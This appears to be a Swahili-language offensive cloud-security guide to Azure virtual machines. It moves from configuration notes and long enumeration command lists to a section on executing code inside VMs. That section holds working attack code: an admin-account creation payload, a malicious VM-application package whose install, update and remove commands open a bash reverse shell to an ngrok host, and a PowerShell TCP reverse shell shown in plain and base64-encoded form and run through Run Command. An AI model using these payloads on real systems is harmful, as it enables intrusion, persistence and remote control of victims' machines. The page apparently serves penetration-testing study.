Mitandao ya Azure ina entiti tofauti na njia za kuikamilisha. Unaweza kupata maelezo mafupi,mfano na amri za kuhesabu za entiti tofauti za mtandao wa Azure katika:
Mashine za Kijijini za Azure (VMs) ni seva za wingu zinazoweza kubadilishwa, zinazohitajika kwa wakati ambazo zinakuwezesha kuendesha mifumo ya uendeshaji ya Windows au Linux. Zinakuwezesha kupeleka programu na mizigo bila kusimamia vifaa halisi. VMs za Azure zinaweza kuundwa kwa chaguzi mbalimbali za CPU, kumbukumbu, na uhifadhi ili kukidhi mahitaji maalum na kuunganishwa na huduma za Azure kama mitandao ya virtual, uhifadhi, na zana za usalama.
Mipangilio ya Usalama
Mikoa ya Upatikanaji: Mikoa ya upatikanaji ni vikundi tofauti vya vituo vya data ndani ya eneo maalum la Azure ambavyo vimegawanywa kimwili ili kupunguza hatari ya mikoa kadhaa kuathiriwa na matatizo ya ndani au majanga.
Aina ya Usalama:
Usalama wa Kawaida: Hii ni aina ya usalama ya msingi ambayo haitaji mipangilio maalum.
Uzinduzi wa Kuaminika: Aina hii ya usalama inaboresha ulinzi dhidi ya boot kits na malware ya kiwango cha kernel kwa kutumia Secure Boot na Virtual Trusted Platform Module (vTPM).
VMs za Siri: Zaidi ya uzinduzi wa kuaminika, inatoa kutengwa kwa msingi wa vifaa kati ya VM, hypervisor na usimamizi wa mwenyeji, inaboresha usimbaji wa diski na zaidi.
Uthibitishaji: Kwa kawaida funguo mpya za SSH zinaundwa, ingawa inawezekana kutumia funguo za umma au kutumia funguo za awali na jina la mtumiaji kwa kawaida ni azureuser. Pia inawezekana kuunda mipangilio ya kutumia neno la siri.
Usimbaji wa diski za VM: Diski inasimbwa kwa kupumzika kwa kawaida kwa kutumia funguo zinazodhibitiwa na jukwaa.
Pia inawezekana kuwezesha Usimbaji kwenye mwenyeji, ambapo data itasimbwa kabla ya kutumwa kwa huduma ya uhifadhi, kuhakikisha usimbaji wa mwisho hadi mwisho kati ya mwenyeji na huduma ya uhifadhi (docs).
Kikundi cha usalama wa mtandao wa NIC:
Hakuna: Kimsingi inafungua kila bandari
Msingi: Inaruhusu kwa urahisi kufungua bandari za ndani HTTP (80), HTTPS (443), SSH (22), RDP (3389)
Juu: Chagua kikundi cha usalama
Nakala: Inawezekana kuwezesha Nakala ya Kawaida (moja kwa siku) na Iliyoboreshwa (mara nyingi kwa siku)
Chaguzi za uratibu wa patch: Hii inaruhusu kutekeleza patch kiotomatiki katika VMs kulingana na sera iliyochaguliwa kama ilivyoelezwa katika docs.
Alerts: Inawezekana kupata arifa kiotomatiki kwa barua pepe au programu ya simu wakati kitu kinatokea katika VM. Sheria za msingi:
Asilimia ya CPU ni kubwa kuliko 80%
Kumbukumbu Inapatikana Bytes ni chini ya 1GB
Asilimia ya IOPS za Diski za Data zinazotumika ni kubwa kuliko 95%
Asilimia ya IOPS za OS zinazotumika ni kubwa kuliko 95%
Mtandao kwa Jumla ni mkubwa kuliko 500GB
Mtandao wa Nje kwa Jumla ni mkubwa kuliko 200GB
VmAvailabilityMetric ni chini ya 1
Msimamizi wa Afya: Kwa kawaida inakagua itifaki ya HTTP kwenye bandari 80
Locks: Inaruhusu kufunga VM ili iweze kusomwa tu (ReadOnly lock) au inaweza kusomwa na kusasishwa lakini si kufutwa (CanNotDelete lock).
Rasilimali nyingi zinazohusiana na VM pia zinasaidia locks kama diski, picha za snapshot...
Locks zinaweza pia kutumika kwenye kikundi cha rasilimali na viwango vya usajili
Diski & picha za snapshot
Inawezekana kuwezesha kuunganisha diski kwa VMs 2 au zaidi
Kwa kawaida kila diski inasimbwa kwa funguo ya jukwaa.
Vivyo hivyo katika picha za snapshot
Kwa kawaida inawezekana kushiriki diski kutoka mitandao yote, lakini pia inaweza kuzuiwa kwa ufikiaji fulani binafsi au kukatisha kabisa ufikiaji wa umma na binafsi.
Vivyo hivyo katika picha za snapshot
Inawezekana kuunda SAS URI (ya max siku 60) ili kuhamasisha diski, ambayo inaweza kuundwa ili kuhitaji uthibitisho au la
Vivyo hivyo katika picha za snapshot
# List all disksazdisklist--outputtable# Get info about a diskazdiskshow--name<disk-name>--resource-group<rsc-group>
# List all disksGet-AzDisk# Get info about a diskGet-AzDisk-Name <DiskName>-ResourceGroupName <ResourceGroupName>
Picha, Picha za Galeria & Pointi za Kurejesha
Picha ya VM ni kiolezo kinachojumuisha mfumo wa uendeshaji, mipangilio ya programu na mfumo wa faili unaohitajika ili kuunda mashine mpya ya virtual (VM). Tofauti kati ya picha na snapshot ya diski ni kwamba snapshot ya diski ni nakala ya kusoma tu, ya wakati mmoja ya diski moja inayosimamiwa, inayotumika hasa kwa ajili ya kuhifadhi au kutatua matatizo, wakati picha inaweza kuwa na diski nyingi na imeundwa kutumikia kama kiolezo cha kuunda VMs mpya.
Picha zinaweza kusimamiwa katika sehemu ya Picha ya Azure au ndani ya galeria za kompyuta za Azure ambazo zinaruhusu kuunda matoleo na kushiriki picha hiyo kati ya wapangaji tofauti au hata kuifanya kuwa ya umma.
Pointi za kurejesha zinahifadhi usanidi wa VM na snapshot za wakati mmoja zinazofanana na programu za diski zote zinazodhibitiwa zilizounganishwa na VM. Inahusiana na VM na kusudi lake ni kuwa na uwezo wa kurejesha VM hiyo jinsi ilivyokuwa katika wakati huo maalum.
# Shared Image Galleries | Compute Galleries## List all galleries and get info about oneazsiglist--outputtableazsigshow--gallery-name<name>--resource-group<rsc-group>## List all community galleriesazsiglist-community--outputtable## List galleries shaerd with meazsiglist-shared--location<location>--outputtable## List all image definitions in a gallery and get info about oneazsigimage-definitionlist--gallery-name<name>--resource-group<rsc-group>--outputtableazsigimage-definitionshow--gallery-image-definition<name>--gallery-name<gallery-name>--resource-group<rsc-group>## List all the versions of an image definition in a galleryazsigimage-versionlist--gallery-image-name<image-name>--gallery-name<gallery-name>--resource-group<rsc-group--outputtable## List all VM applications inside a galleryazsiggallery-applicationlist--gallery-name<gallery-name>--resource-group<res-group>--outputtable# Images# List all managed images in your subscriptionazimagelist--outputtable# Restore points## List all restore points and get info about 1azrestore-pointcollectionlist-all--outputtableazrestore-pointcollectionshow--collection-name<collection-name>--resource-group<rsc-group>
## List all galleries and get info about oneGet-AzGalleryGet-AzGallery-Name <GalleryName>-ResourceGroupName <ResourceGroupName>## List all image definitions in a gallery and get info about oneGet-AzGalleryImageDefinition-GalleryName <GalleryName>-ResourceGroupName <ResourceGroupName>Get-AzGalleryImageDefinition-GalleryName <GalleryName>-ResourceGroupName <ResourceGroupName>-Name <ImageDefinitionName>## List all the versions of an image definition in a galleryGet-AzGalleryImageVersion-GalleryImageDefinitionName <ImageName>-GalleryName <GalleryName>-ResourceGroupName <ResourceGroupName>## List all VM applications inside a galleryGet-AzGalleryApplication-GalleryName <GalleryName>-ResourceGroupName <ResourceGroupName># Images# List all managed images in your subscriptionGet-AzImage-Name <ResourceName>-ResourceGroupName <ResourceGroupName># Restore points## List all restore points and get info about 1Get-AzRestorePointCollection-Name <CollectionName>-ResourceGroupName <ResourceGroupName>
Azure Site Recovery
Kutoka kwa docs: Site Recovery husaidia kuhakikisha uendelevu wa biashara kwa kuweka programu za biashara na mizigo ikifanya kazi wakati wa kukatika. Site Recovery inaiga mizigo inayofanya kazi kwenye mashine za kimwili na virtual (VMs) kutoka tovuti ya msingi hadi eneo la pili. Wakati kukatika kunapotokea kwenye tovuti yako ya msingi, unahamia kwenye eneo la pili, na kufikia programu kutoka hapo. Baada ya eneo la msingi kuanza tena, unaweza kurudi huko.
Azure Bastion
Azure Bastion inaruhusu Remote Desktop Protocol (RDP) na Secure Shell (SSH) kwa usalama na bila mshono kwa mashine zako za virtual (VMs) moja kwa moja kupitia Azure Portal au kupitia sanduku la jump. Kwa kuondoa hitaji la anwani za IP za umma kwenye VMs zako.
Bastion inapeleka subnet inayoitwa AzureBastionSubnet yenye netmask ya /26 katika VNet ambayo inahitaji kufanya kazi. Kisha, inaruhusu kuungana na VMs za ndani kupitia kivinjari kwa kutumia RDP na SSH bila kufichua bandari za VMs kwa Mtandao. Inaweza pia kufanya kazi kama jump host.
Ili kuorodhesha Hosts zote za Azure Bastion katika usajili wako na kuungana na VMs kupitia hizo, unaweza kutumia amri zifuatazo:
# List bastionsaznetworkbastionlist-otable# Connect via SSH through bastionaznetworkbastionssh \--name MyBastion \--resource-group MyResourceGroup \--target-resource-id /subscriptions/12345678-1234-1234-1234-123456789abc/resourceGroups/MyResourceGroup/providers/Microsoft.Compute/virtualMachines/MyVM \--auth-type ssh-key \--username azureuser \--ssh-key ~/.ssh/id_rsa# Connect via RDP through bastionaznetworkbastionrdp \--name <BASTION_NAME> \--resource-group <RESOURCE_GROUP> \--target-resource-id /subscriptions/<SUBSCRIPTION_ID>/resourceGroups/<RESOURCE_GROUP>/providers/Microsoft.Compute/virtualMachines/<VM_NAME> \--auth-type password \--username <VM_USERNAME> \--password <VM_PASSWORD>
# List bastionsGet-AzBastion
Metadata
Huduma ya Metadata ya Azure Instance (IMDS) inatoa taarifa kuhusu kuendesha mifano ya mashine za virtual kusaidia katika usimamizi na usanidi wao. Inatoa maelezo kama vile SKU, uhifadhi, usanidi wa mtandao, na taarifa kuhusu matukio ya matengenezo yanayokuja kupitia REST API inayopatikana kwenye anwani ya IP isiyoweza kuelekezwa 169.254.169.254, ambayo inapatikana tu kutoka ndani ya VM. Mawasiliano kati ya VM na IMDS yanabaki ndani ya mwenyeji, kuhakikisha ufikiaji salama. Wakati wa kuuliza IMDS, wateja wa HTTP ndani ya VM wanapaswa kupita kupitia proxies za wavuti ili kuhakikisha mawasiliano sahihi.
Zaidi ya hayo, ili kuwasiliana na mwisho wa metadata, ombi la HTTP lazima liwe na kichwa Metadata: true na halipaswi kuwa na kichwa X-Forwarded-For.
Angalia jinsi ya kuhesabu katika:
VM Enumeration
# VMs## List all VMs and get info about oneazvmlist--outputtableazvmshow--name<came>--resource-group<rsc-group>## List all available VM images and get info about oneazvmimagelist--all--outputtable# VM Extensions## List all VM extensionsazvmextensionimagelist--outputtable## Get extensions by publisherazvmextensionimagelist--publisher"Site24x7"--outputtable## List extensions in a VMazvmextensionlist-g<rsc-group>--vm-name<vm-name>## List managed identities in a VMazvmidentityshow \--resource-group <rsc-group> \--name <vm-name># Disks## List all disks and get info about oneazdisklist--outputtableazdiskshow--name<disk-name>--resource-group<rsc-group># Snapshots## List all galleries abd get info about oneazsiglist--outputtableazsigshow--gallery-name<name>--resource-group<rsc-group>## List all snapshots and get info about oneazsnapshotlist--outputtableazsnapshotshow--name<name>--resource-group<rsc-group># Shared Image Galleries | Compute Galleries## List all galleries and get info about oneazsiglist--outputtableazsigshow--gallery-name<name>--resource-group<rsc-group>## List all community galleriesazsiglist-community--outputtable## List galleries shared with meazsiglist-shared--location<location>--outputtable## List all image definitions in a gallery and get info about oneazsigimage-definitionlist--gallery-name<name>--resource-group<rsc-group>--outputtableazsigimage-definitionshow--gallery-image-definition<name>--gallery-name<gallery-name>--resource-group<rsc-group>## List all the versions of an image definition in a galleryazsigimage-versionlist--gallery-image-name<image-name>--gallery-name<gallery-name>--resource-group<rsc-group--outputtable## List all VM applications inside a galleryazsiggallery-applicationlist--gallery-name<gallery-name>--resource-group<res-group>--outputtable# Images# List all managed images in your subscriptionazimagelist--outputtable# Restore points## List all restore points and get info about 1azrestore-pointcollectionlist-all--outputtableazrestore-pointcollectionshow--collection-name<collection-name>--resource-group<rsc-group># Bastion## list all bastionsaznetworkbastionlist-otable# Network## List VNetsaznetworkvnetlist--query"[].{name:name, location:location, addressSpace:addressSpace}"## List subnets of a VNetaznetworkvnetsubnetlist--resource-group<ResourceGroupName>--vnet-name<VNetName>--query"[].{name:name, addressPrefix:addressPrefix}"-otable## List public IPsaznetworkpublic-iplist--outputtable## Get NSG rulesaznetworknsgrulelist--nsg-name<NSGName>--resource-group<ResourceGroupName>--query"[].{name:name, priority:priority, direction:direction, access:access, protocol:protocol, sourceAddressPrefix:sourceAddressPrefix, destinationAddressPrefix:destinationAddressPrefix, sourcePortRange:sourcePortRange, destinationPortRange:destinationPortRange}"-otable## Get NICs and subnets using this NSGaznetworknsgshow--nameMyLowCostVM-nsg--resource-groupResource_Group_1--query"{subnets: subnets, networkInterfaces: networkInterfaces}"## List all Nics & get info of a single oneaznetworkniclist--outputtableaznetworknicshow--name<name>--resource-group<rsc-group>## List Azure Firewallsaznetworkfirewalllist--query"[].{name:name, location:location, subnet:subnet, publicIp:publicIp}"-otable## Get network rules of a firewallaznetworkfirewallnetwork-rulecollectionlist--firewall-name<FirewallName>--resource-group<ResourceGroupName>--query"[].{name:name, rules:rules}"-otable## Get application rules of a firewallaznetworkfirewallapplication-rulecollectionlist--firewall-name<FirewallName>--resource-group<ResourceGroupName>--query"[].{name:name, rules:rules}"-otable## Get nat rules of a firewallaznetworkfirewallnat-rulecollectionlist--firewall-name<FirewallName>--resource-group<ResourceGroupName>--query"[].{name:name, rules:rules}"-otable## List Route Tablesaznetworkroute-tablelist--query"[].{name:name, resourceGroup:resourceGroup, location:location}"-otable## List routes for a tableaznetworkroute-tableroutelist--route-table-name<RouteTableName>--resource-group<ResourceGroupName>--query"[].{name:name, addressPrefix:addressPrefix, nextHopType:nextHopType, nextHopIpAddress:nextHopIpAddress}"-otable# Misc## List all virtual machine scale setsazvmsslist--outputtable## List all availability setsazvmavailability-setlist--outputtable## List all load balancersaznetworklblist--outputtable## List all storage accountsazstorageaccountlist--outputtable## List all custom script extensions on a specific VMazvmextensionlist--vm-name<vm-name>--resource-group<resource-group># Show boot diagnostics settings for a specific VMazvmboot-diagnosticsget-boot-log--name<vm-name>--resource-group<resource-group>## List all tags on virtual machinesazresourcelist--resource-type"Microsoft.Compute/virtualMachines"--query"[].{Name:name, Tags:tags}"--outputtable# List all available run commands for virtual machinesazvmrun-commandlist--outputtable
# Get readable VMsGet-AzVM| fl# Lis running VMsGet-AzureRmVM-status |where {$_.PowerState-EQ"VM running"} | select ResourceGroupName,NameGet-AzVM-Name <name>-ResourceGroupName <res_group_name>| fl *Get-AzVM-Name <name>-ResourceGroupName <res_group_name>| select -ExpandProperty NetworkProfile# Get iface and IP addressGet-AzNetworkInterface-Name <interface_name>Get-AzPublicIpAddress-Name <iface_public_ip_id>#Get installed extensionsGet-AzVMExtension-ResourceGroupName <res_group_name>-VMName <name>Get-AzVM| select -ExpandProperty NetworkProfile # Get name of network connector of VMGet-AzNetworkInterface-Name <name># Get info of network connector (like IP)# Disks## List all disks and get info about oneGet-AzDiskGet-AzDisk-Name <DiskName>-ResourceGroupName <ResourceGroupName># Snapshots## List all galleries abd get info about oneGet-AzGalleryGet-AzGallery-Name <GalleryName>-ResourceGroupName <ResourceGroupName>## List all snapshots and get info about oneGet-AzSnapshotGet-AzSnapshot-Name <SnapshotName>-ResourceGroupName <ResourceGroupName>## List all image definitions in a gallery and get info about oneGet-AzGalleryImageDefinition-GalleryName <GalleryName>-ResourceGroupName <ResourceGroupName>Get-AzGalleryImageDefinition-GalleryName <GalleryName>-ResourceGroupName <ResourceGroupName>-Name <ImageDefinitionName>## List all the versions of an image definition in a galleryGet-AzGalleryImageVersion-GalleryImageDefinitionName <ImageName>-GalleryName <GalleryName>-ResourceGroupName <ResourceGroupName>## List all VM applications inside a galleryGet-AzGalleryApplication-GalleryName <GalleryName>-ResourceGroupName <ResourceGroupName># Images# List all managed images in your subscriptionGet-AzImage-Name <ResourceName>-ResourceGroupName <ResourceGroupName># Restore points## List all restore points and get info about 1Get-AzRestorePointCollection-Name <CollectionName>-ResourceGroupName <ResourceGroupName># Bastion## List bastionsGet-AzBastion# Network## List all VNets in your subscriptionGet-AzVirtualNetwork## List VNet peering connections for a given VNet(Get-AzVirtualNetwork-ResourceGroupName <ResourceGroupName>-Name <VNetName>).VirtualNetworkPeerings## List Shared Resources (e.g., Azure Firewall) in the HubGet-AzFirewall## List VPN GatewaysGet-AzVirtualNetworkGateway-ResourceGroupName <ResourceGroupName>## List VPN ConnectionsGet-AzVirtualNetworkGatewayConnection-ResourceGroupName <ResourceGroupName>## List ExpressRoute CircuitsGet-AzExpressRouteCircuit# Misc## List all virtual machine scale setsGet-AzVmss## List all availability setsGet-AzAvailabilitySet## List all load balancersGet-AzLoadBalancer## List all storage accountsGet-AzStorageAccount## List all custom script extensions on a specific VMGet-AzVMExtension-VMName <VmName>-ResourceGroupName <ResourceGroupName>
Utekelezaji wa Msimbo katika VMs
Upanuzi wa VM
Upanuzi wa Azure VM ni programu ndogo zinazotoa mipangilio baada ya kutekelezwa na kazi za automatisering kwenye mashine za virtual za Azure (VMs).
Hii itaruhusu kutekeleza msimbo wowote ndani ya VMs.
Ruhusa inayohitajika ni Microsoft.Compute/virtualMachines/extensions/write.
Inawezekana kuorodhesha upanuzi wote wanaopatikana kwa:
# It takes some mins to runazvmextensionimagelist--outputtable# Get extensions by publisherazvmextensionimagelist--publisher"Site24x7"--outputtable
# It takes some mins to runGet-AzVMExtensionImage-Location <Location>-PublisherName <PublisherName>-Type <Type>
Inawezekana kufanya kazi na nyongeza za kawaida ambazo zinaendesha msimbo wa kawaida:
Unaweza pia kutekeleza payloads nyingine kama: powershell net users new_user Welcome2022. /add /Y; net localgroup administrators new_user /add
Rejesha nenosiri ukitumia nyongeza ya VMAccess
# Run VMAccess extension to reset the password$cred=Get-Credential# Username and password to reset (if it doesn't exist it'll be created). "Administrator" username is allowed to change the passwordSet-AzVMAccessExtension-ResourceGroupName "<rsc-group>"-VMName "<vm-name>"-Name "myVMAccess"-Credential $cred
Relevant VM extensions
Ruhusa inayohitajika bado ni Microsoft.Compute/virtualMachines/extensions/write.
VMAccess extension
Kipanua hiki kinaruhusu kubadilisha nenosiri (au kuunda ikiwa hakipo) cha watumiaji ndani ya VMs za Windows.
# Run VMAccess extension to reset the password$cred=Get-Credential# Username and password to reset (if it doesn't exist it'll be created). "Administrator" username is allowed to change the passwordSet-AzVMAccessExtension-ResourceGroupName "<rsc-group>"-VMName "<vm-name>"-Name "myVMAccess"-Credential $cred
DesiredConfigurationState (DSC)
Hii ni VM extension inayomilikiwa na Microsoft inayotumia PowerShell DSC kusimamia usanidi wa Azure Windows VMs. Hivyo, inaweza kutumika kutekeleza amri zisizo na mipaka katika Windows VMs kupitia nyongeza hii:
Hii ni nyongeza ya VM ambayo itaruhusu kutekeleza runbooks katika VMs kutoka kwa akaunti ya automatisering. Kwa maelezo zaidi angalia huduma ya Automation Accounts.
VM Applications
Hizi ni pakiti zenye data za programu zote na scripts za kufunga na kuondoa ambazo zinaweza kutumika kuongeza na kuondoa programu kwa urahisi katika VMs.
# List all galleries in resource groupazsiglist--resource-group<res-group>--outputtable# List all apps in a falleryazsiggallery-applicationlist--gallery-name<gallery-name>--resource-group<res-group>--outputtable
Hizi ni njia ambapo programu zinapakuliwa ndani ya mfumo wa faili:
Inawezekana kushiriki programu binafsi na maktaba na usajili au wapangaji wengine. Hii ni ya kuvutia sana kwa sababu inaweza kumruhusu mshambuliaji kuingiza programu na kuhamasisha kwa usajili na wapangaji wengine.
Lakini hakuna "soko" la programu za vm kama ilivyo kwa nyongeza.
Mfano wa unyakuzi wa kutekeleza amri zisizo na mipaka:
# Create gallery (if the isn't any)azsigcreate--resource-groupmyResourceGroup \--gallery-name myGallery--location"West US 2"# Create application containerazsiggallery-applicationcreate \--application-name myReverseShellApp \--gallery-name myGallery \--resource-group <rsc-group> \--os-type Linux \--location "West US 2"# Create app version with the rev shell## In Package file link just add any link to a blobl storage fileazsiggallery-applicationversioncreate \--version-name 1.0.2 \--application-name myReverseShellApp \--gallery-name myGallery \--location "West US 2" \--resource-group <rsc-group> \--package-file-link "https://testing13242erih.blob.core.windows.net/testing-container/asd.txt?sp=r&st=2024-12-04T01:10:42Z&se=2024-12-04T09:10:42Z&spr=https&sv=2022-11-02&sr=b&sig=eMQFqvCj4XLLPdHvnyqgF%2B1xqdzN8m7oVtyOOkMsCEY%3D" \--install-command "bash -c 'bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/19159 0>&1'" \--remove-command "bash -c 'bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/19159 0>&1'" \--update-command "bash -c 'bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/19159 0>&1'"# Install the app in a VM to execute the rev shell## Use the ID given in the previous outputazvmapplicationset \--resource-group <rsc-group> \--name <vm-name> \--app-version-ids /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.Compute/galleries/myGallery/applications/myReverseShellApp/versions/1.0.2 \--treat-deployment-as-failure true
# Create gallery (if the isn't any)azsigcreate--resource-group<rsc-group> \--gallery-name myGallery--location"West US 2"# Create application containerazsiggallery-applicationcreate \--application-name myReverseShellAppWin \--gallery-name myGallery \--resource-group <rsc-group> \--os-type Windows \--location "West US 2"# Get encoded reverse shellecho -n '$client = New-Object System.Net.Sockets.TCPClient("7.tcp.eu.ngrok.io",19159);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' | iconv --to-code UTF-16LE | base64
# Create app version with the rev shell## In Package file link just add any link to a blobl storage fileexport encodedCommand="JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIANwAuAHQAYwBwAC4AZQB1AC4AbgBnAHIAbwBrAC4AaQBvACIALAAxADkAMQA1ADkAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA="
azsiggallery-applicationversioncreate \--version-name 1.0.0 \--application-name myReverseShellAppWin \--gallery-name myGallery \--location "West US 2" \--resource-group <rsc-group> \--package-file-link "https://testing13242erih.blob.core.windows.net/testing-container/asd.txt?sp=r&st=2024-12-04T01:10:42Z&se=2024-12-04T09:10:42Z&spr=https&sv=2022-11-02&sr=b&sig=eMQFqvCj4XLLPdHvnyqgF%2B1xqdzN8m7oVtyOOkMsCEY%3D" \--install-command "powershell.exe -EncodedCommand $encodedCommand" \--remove-command "powershell.exe -EncodedCommand $encodedCommand" \--update-command "powershell.exe -EncodedCommand $encodedCommand"# Install the app in a VM to execute the rev shell## Use the ID given in the previous outputazvmapplicationset \--resource-group <rsc-group> \--name deleteme-win4 \--app-version-ids /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.Compute/galleries/myGallery/applications/myReverseShellAppWin/versions/1.0.0 \--treat-deployment-as-failure true
User data
Hii ni data ya kudumu ambayo inaweza kupatikana kutoka kwa kiungo cha metadata wakati wowote. Kumbuka katika Azure, data ya mtumiaji ni tofauti na AWS na GCP kwa sababu ikiwa unaweka script hapa haitekelezwi kwa default.
Custom data
Inawezekana kupitisha data fulani kwa VM ambayo itahifadhiwa katika njia zinazotarajiwa:
Katika Windows, data ya kawaida inawekwa katika %SYSTEMDRIVE%\AzureData\CustomData.bin kama faili ya binary na haisindiki.
Katika Linux, ilihifadhiwa katika /var/lib/waagent/ovf-env.xml na sasa inahifadhiwa katika /var/lib/waagent/CustomData/ovf-env.xml
Linux agent: Haisindiki data ya kawaida kwa default, picha maalum yenye data iliyoanzishwa inahitajika
cloud-init: Kwa default inasindika data ya kawaida na data hii inaweza kuwa katika format mbalimbali. Inaweza kutekeleza script kwa urahisi kwa kutuma tu script katika data ya kawaida.
Nilijaribu kwamba zote Ubuntu na Debian zinafanya script unayoweka hapa.
Pia si lazima kuwezesha data ya mtumiaji ili hii itekelezwe.
#!/bin/shecho"Hello World">/var/tmp/output.txt
Run Command
Hii ni njia ya msingi zaidi ambayo Azure inatoa ili kutekeleza amri zisizo na mpangilio katika VMs. Ruhusa inayohitajika ni Microsoft.Compute/virtualMachines/runCommand/action.
# The permission allowing this is Microsoft.Compute/virtualMachines/runCommand/action# Execute a rev shellazvmrun-commandinvoke \--resource-group Research \--name juastavm \--command-id RunPowerShellScript \--scripts @revshell.ps1## Get encoded reverse shellecho -n '$client = New-Object System.Net.Sockets.TCPClient("7.tcp.eu.ngrok.io",19159);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' | iconv --to-code UTF-16LE | base64
## Create app version with the rev shell## In Package file link just add any link to a blobl storage fileexport encodedCommand="JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIANwAuAHQAYwBwAC4AZQB1AC4AbgBnAHIAbwBrAC4AaQBvACIALAAxADkAMQA1ADkAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA="
